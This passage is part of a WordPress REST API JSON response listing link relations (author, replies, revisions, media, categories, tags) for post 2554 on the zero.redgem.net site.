:{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2554"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}